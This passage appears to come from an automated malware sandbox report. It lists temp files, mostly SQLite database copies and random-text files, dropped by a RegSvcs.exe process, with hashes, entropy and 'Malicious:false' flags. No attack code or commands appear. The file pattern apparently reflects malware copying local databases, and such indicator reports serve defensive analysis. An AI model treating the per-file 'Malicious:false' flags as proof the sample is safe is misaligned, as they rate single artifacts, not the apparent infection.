                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                      C:\Users\user\AppData\Local\Temp\tmp9AA3.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                      C:\Users\user\AppData\Local\Temp\tmp9AA4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                      C:\Users\user\AppData\Local\Temp\tmpA505.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB630.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB641.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB652.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB672.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB673.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB693.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB6A4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB737.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB747.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB768.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpB778.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpC8B4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpC8D4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpC8E5.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC33.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC53.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
